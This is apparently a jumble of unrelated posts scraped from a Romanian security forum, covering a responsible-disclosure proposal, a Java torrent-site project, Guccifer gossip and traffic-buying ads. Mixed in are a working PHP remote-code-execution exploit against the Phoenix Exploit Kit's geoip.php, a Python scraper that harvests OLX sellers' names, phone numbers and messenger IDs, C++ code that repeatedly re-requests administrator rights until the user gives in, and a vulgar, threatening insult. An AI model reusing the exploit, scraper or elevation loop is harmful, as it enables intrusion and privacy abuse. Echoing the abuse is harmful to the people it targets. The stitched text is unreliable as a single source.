Leaderboard

In anul 2011, in Olanda 2 incidente de securitate majore au devenit publice: cazul DigiNotar(1) si o vulnerabilitate in cardul lor pentru transportul public(2). The National Cyber Security Centre (NCSC) din Olanda a colaborat cu sectoare importante, precum sectorul telecomunicatiilor si sectorul financiar pentru a crea un ghid de tip "Responsible disclosure". Succesul acestui ghid se poate observa si prin participarea unor banci olandeze in aceste programe precum: SNS Bank, ING, NN si Regio Bank. In general exista o problema universala cu un astfel de ghid: nu sunt specificate reguli exacte pentru metodologia de raportare. Acest lucru este evidentiat in articolul "Instagram's Million Dollar Bug"(3), mai exact prin acest citat: "There is no rule which states what to do when a vulnerability is discovered". Doresc sa creez un ghid specific aplicatiilor web (care include si domeniu embedded devices) transparent si dinamic in colaborare cu sectorul public, privat si cel civic. Pentru a intelege mai exact, voi oferi un exemplu: Daca exista un SQL injection intr-o aplicatie web, pentru demonstratia conceptului se va trimite doar @@version . Un acord comun legal pentru a valida conceptul si pentru a pastra integritatea database-ului. Doresc prin acest ghid urmatoarele: -capacitatea societati de a se apara in domeniul digital, -stimularea securitati cibernetice in Romania, -parteneriate pe plan international (CERT-*, NCSC-NL), -angajarea mai usoara a persoanelor care sunt in domeniu sau unui internediar, La acest ghid voi atasa o platforma in care voi prezenta printre altele: -cerintelor pentru a sustine un asemenea program, -standarde precum ISO 30111 sau ISO 29147, Totodata prin acesta platforma, voi comercializa persoanele din Romania care au contribuit la securitatea cibernetic internationala (Bogdan Alecu(4), Dragos Gaftoneanu(5)) cat si celor care sunt implicati activi in acest domeniu (Daniel Bugarin(6)). Am decis sa postez public proiectul meu deoarece imi doresc transparenta si prin aceasta metoda puteti observa feedback-ul comunitati. Referinte: (1) - https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/ (2) - http://www.proxmark.org/files/Documents/13.56%20MHz%20-%20MIFARE%20Classic/Reverse_engineering_the_memory_layout_of_the_OV-Chipkaart.pdf (3) - http://www.exfiltrated.com/research-Instagram-RCE.php (4) - http://www.pcworld.com/article/246528/remote_sms_attack_can_force_mobile_phones_to_send_premiumrate_text_messages.html (5) - http://news.softpedia.com/news/Anti-Keylogger-Application-KeyScrambler-Is-Ineffective-Expert-Says-327441.shtml (6) - "Locul 6 in Lume" - http://www.wechall.net/ranking Va multumesc pentru atentia acordata!

Cred ca e Guccifer taximetristul hacker.

This post requires you to click the Likes button to read this content. http://a.pomf.se/pjmwvx.png """ OLX.ro scraper Gets name, phone no., Yahoo! & Skype addresses, where applicable http://a.pomf.se/pjmwvx.png """ import re import json import requests from bs4 import BeautifulSoup as b pages = 1 # How many pages should be scraped # Category URL, a.k.a. where to get the ads from catURL = "http://olx.ro/electronice-si-electrocasnice/laptop-calculator/" # Links to the Ajax requests ajaxNum = "http://olx.ro/ajax/misc/contact/phone/" ajaxYah = "http://olx.ro/ajax/misc/contact/communicator/" ajaxSky = "http://olx.ro/ajax/misc/contact/skype/" def getName(link): # Get the name from the ad page = requests.get(link) soup = b(page.text) match = soup.find(attrs={"class": "block color-5 brkword xx-large"}) name = re.search(">(.+)<", str(match)).group(1) return name def getPhoneNum(aID): # Get the phone number resp = requests.get("%s%s/" % (ajaxNum, aID)).text try: resp = json.loads(resp).get("value") except ValueError: return # No phone number if "span" in resp: # Multiple phone numbers nums = b(resp).find_all(text=True) for num in nums: if num != " ": return num else: return resp def getYahoo(aID): # Get the Yahoo! ID resp = requests.get("%s%s/" % (ajaxYah, aID)).text try: resp = json.loads(resp).get("value") except ValueError: return # No Yahoo! ID else: return resp def getSkype(aID): # Get the Skype ID resp = requests.get("%s%s/" % (ajaxSky, aID)).text try: resp = json.loads(resp).get("value") except ValueError: return # No Skype ID else: return resp def main(): for pageNum in range(1, pages+1): print("Page %d." % pageNum) page = requests.get(catURL + "?page=" + str(pageNum)) soup = b(page.text) links = soup.findAll(attrs={"class": "marginright5 link linkWithHash \ detailsLink"}) for a in links: aID = re.search('ID(.+)\.', a['href']).group(1) print("ID: %s" % aID) print("\tName: %s" % getName(a['href'])) if getPhoneNum(aID) != None: print("\tPhone: %s" % getPhoneNum(aID)) if getYahoo(aID) != None: print("\tYahoo: %s" % getYahoo(aID)) if getSkype(aID) != None: print("\tSkype: %s" % getSkype(aID)) if __name__ == "__main__": main() Tocmai scraper: https://rstforums.com/forum/98245-tocmai-ro-scraper-nume-oras-numar-telefon.rst

Vazand sutele de site-uri de torrente care se inchid am realizat o aplicatie in Java care imita platforma TBDEV cu scopul de a inlocui site-urile web de torrente. Scoupul principal a fost sa invat Java, aplicatia fiind un practice bun deoarece utilizeaza cat mai multe functii. Aplicatia este doar pentru PC-uri, nu poate fi rulata in browser, am creat-o primavara aceasta, dar am abandonat-o din lipsa de timp. As vrea sa stiu daca se merita sa o continui, daca se merita sa o fac open-source si daca sunt pe forum oameni care doresc sa colaboreze pentru a o termini si imbunatati. Inainte sa veniti cu comentarii rautacioase, vreau sa specific ca designul aplicatiei apartine celor de la iPlay.ro, un site de torrente romanesc care din pacate nu mai exista, am incercat sa contactez administratorii acelui site pentru a le cere acordul de a le folosi designul, dar nu am putut sa dau de ei. Mai jos aveti cateva printscreen-uri ale aplicatiei: All images: https://s17.postimg.org/9cr92h9xr/Screen_Shot_2016_08_12_at_9_10_43_PM.png https://s17.postimg.org/hwan08ia7/Screen_Shot_2016_08_12_at_9_10_49_PM.png https://s17.postimg.org/aucpe1eof/Screen_Shot_2016_08_12_at_9_10_52_PM.png https://s17.postimg.org/6mhx5ad8v/Screen_Shot_2016_08_12_at_9_11_00_PM.png https://s17.postimg.org/cby5pljf3/Screen_Shot_2016_08_12_at_9_11_22_PM.png https://s17.postimg.org/71t6yaz67/Screen_Shot_2016_08_12_at_9_11_27_PM.png https://s17.postimg.org/4yirqmzdb/Screen_Shot_2016_08_12_at_9_11_35_PM.png https://s17.postimg.org/fzii9egzz/Screen_Shot_2016_08_12_at_9_16_56_PM.png https://s17.postimg.org/7vae4nukv/Screen_Shot_2016_08_12_at_9_17_06_PM.png https://s17.postimg.org/9odaszfrj/Screen_Shot_2016_08_12_at_9_17_14_PM.png https://s17.postimg.org/41gxvid8v/Screen_Shot_2016_08_12_at_9_17_27_PM.png https://s17.postimg.org/9qx6ftjf3/Screen_Shot_2016_08_12_at_9_17_35_PM.png https://s17.postimg.org/q5r3se1e7/Screen_Shot_2016_08_12_at_9_18_03_PM.png

<?php /* # # Phoenix Exploit Kit # - Remote Code Execution # : /includes/geoip.php */ $site = "http://127.0.0.1/phoenix/"; $target = "includes/geoip.php?bdr="; $payload = "passthru('uname -a')"; function curl_get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1"); $output = curl_exec($ch); curl_close($ch); return $output; } echo curl_get($site.$target.$payload); ?>

http://stirileprotv.ro/stiri/actualitate/instanta-suprema-decide-soarta-celui-mai-temut-hacker-roman-de-pe-planeta-7-ani-de-inchisoare-in-tara-sau-50-in-sua.html Ai de pula mea... ratatul asta e numit "cel mai temut hacker roman de pe planeta" @Stealth ai concurenta ba :\

A capatat 4 ani http://www.reuters.com/article/us-usa-cyber-guccifer-idUSKCN1175FB

Ti-ai castigat un singur drept: acela unde o futem toti pe ma-ta in grup astfel incat la urma, cand se uita la mutra-i (de impins vagoane) in oglinda, sa creada ca se uita la casetofonul unui zugrav. Imi doresc sa reusesti sa dai teapa unui singur baiat. Dar acel baiat sa fie intr-o situatie disperata, ca multi romani, sa ia probabil de la gura copiiilor si sa incerce sa castige un ban. Si apoi cand ii pierde sa se puna cu pulanul pe tine incat toata viata sa bei mancarea cu paiul. Ca legea, asa proasta cum e facuta, va sufla de praf. Si pana nu se pune cineva cu pulanul pe voi nu va bagati mintile in cap.

#include <iostream> #include <iomanip> #include <Windows.h> using namespace std; BOOL IsRunAsAdmin(); void elevate(); BOOL IsProcessElevated(); DWORD GetProcessIntegrityLevel(); BOOL Elevate(); int main() { Elevate(); } BOOL Elevate() { while (IsRunAsAdmin() == FALSE) { if (IsRunAsAdmin() == FALSE) { wchar_t szPath[MAX_PATH]; if (GetModuleFileName(NULL, (LPSTR)szPath, ARRAYSIZE(szPath))) { // Launch itself as administrator. SHELLEXECUTEINFO sei = { sizeof(sei) }; sei.lpVerb = (LPSTR)"runas"; sei.lpFile = (LPSTR)szPath; sei.hwnd = NULL; sei.nShow = SW_NORMAL; if (!ShellExecuteEx(&sei)) { DWORD dwError = GetLastError(); if (dwError == ERROR_CANCELLED) { // The user refused the elevation. // Do nothing ... } else { NULL; } } else { return TRUE; // Quit itself } } } else { NULL; } Sleep(500); } return FALSE; } BOOL IsRunAsAdmin() { BOOL fIsRunAsAdmin = FALSE; DWORD dwError = ERROR_SUCCESS; PSID pAdministratorsGroup = NULL; // Allocate and initialize a SID of the administrators group. SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY; if (!AllocateAndInitializeSid( &NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &pAdministratorsGroup)) { dwError = GetLastError(); goto Cleanup; } // Determine whether the SID of administrators group is enabled in // the primary access token of the process. if (!CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin)) { dwError = GetLastError(); goto Cleanup; } Cleanup: // Centralized cleanup for all allocated resources. if (pAdministratorsGroup) { FreeSid(pAdministratorsGroup); pAdministratorsGroup = NULL; } // Throw the error if something failed in the function. if (ERROR_SUCCESS != dwError) { throw dwError; } return fIsRunAsAdmin; } BOOL IsProcessElevated() { BOOL fIsElevated = FALSE; DWORD dwError = ERROR_SUCCESS; HANDLE hToken = NULL; // Open the primary access token of the process with TOKEN_QUERY. if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { dwError = GetLastError(); goto Cleanup; } // Retrieve token elevation information. TOKEN_ELEVATION elevation; DWORD dwSize; if (!GetTokenInformation(hToken, TokenElevation, &elevation, sizeof(elevation), &dwSize)) { // When the process is run on operating systems prior to Windows // Vista, GetTokenInformation returns FALSE with the // ERROR_INVALID_PARAMETER error code because TokenElevation is // not supported on those operating systems. dwError = GetLastError(); goto Cleanup; } fIsElevated = elevation.TokenIsElevated; Cleanup: // Centralized cleanup for all allocated resources. if (hToken) { CloseHandle(hToken); hToken = NULL; } // Throw the error if something failed in the function. if (ERROR_SUCCESS != dwError) { throw dwError; } return fIsElevated; } DWORD GetProcessIntegrityLevel() { DWORD dwIntegrityLevel = 0; DWORD dwError = ERROR_SUCCESS; HANDLE hToken = NULL; DWORD cbTokenIL = 0; PTOKEN_MANDATORY_LABEL pTokenIL = NULL; // Open the primary access token of the process with TOKEN_QUERY. if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { dwError = GetLastError(); goto Cleanup; } // Query the size of the token integrity level information. Note that // we expect a FALSE result and the last error ERROR_INSUFFICIENT_BUFFER // from GetTokenInformation because we have given it a NULL buffer. On // exit cbTokenIL will tell the size of the integrity level information. if (!GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &cbTokenIL)) { if (ERROR_INSUFFICIENT_BUFFER != GetLastError()) { // When the process is run on operating systems prior to Windows // Vista, GetTokenInformation returns FALSE with the // ERROR_INVALID_PARAMETER error code because TokenElevation // is not supported on those operating systems. dwError = GetLastError(); goto Cleanup; } } // Now we allocate a buffer for the integrity level information. pTokenIL = (TOKEN_MANDATORY_LABEL *)LocalAlloc(LPTR, cbTokenIL); if (pTokenIL == NULL) { dwError = GetLastError(); goto Cleanup; } // Retrieve token integrity level information. if (!GetTokenInformation(hToken, TokenIntegrityLevel, pTokenIL, cbTokenIL, &cbTokenIL)) { dwError = GetLastError(); goto Cleanup; } // Integrity Level SIDs are in the form of S-1-16-0xXXXX. (e.g. // S-1-16-0x1000 stands for low integrity level SID). There is one and // only one subauthority. dwIntegrityLevel = *GetSidSubAuthority(pTokenIL->Label.Sid, 0); Cleanup: // Centralized cleanup for all allocated resources. if (hToken) { CloseHandle(hToken); hToken = NULL; } if (pTokenIL) { LocalFree(pTokenIL); pTokenIL = NULL; cbTokenIL = 0; } // Throw the error if something failed in the function. if (ERROR_SUCCESS != dwError) { throw dwError; } return dwIntegrityLevel; }

Un mic fum spulberat de vant. Niciodata nu a fost mai mult. Prea multi exagereaza incercand sa-l faca faimos.

ziua taximetrist si noaptea hacker.... acest batman al internetului :)))))))))))

Putea sa faca ceva mai util, sa "sparga" contul de iCloud al Emmei Watson El e cel care a pornit "The fappening" cu Jennifer Lawrence si restul?

Umbla cu vrajeala ... am inceput sa-i transfer trafic, a spus ca mi-a transferat banii au trecut 3 zile si inca nu au ajuns banii de la un transfer bancar

Cumpar trafic adult si NON-ADULT Indiferent de cantitate incepand de la 100 unici per zi - pana la 100.000 unici. Traficul sa fie real ( exclus hitleap sau alte bazaconii ) Bugetul este negociabil in functie de cantitate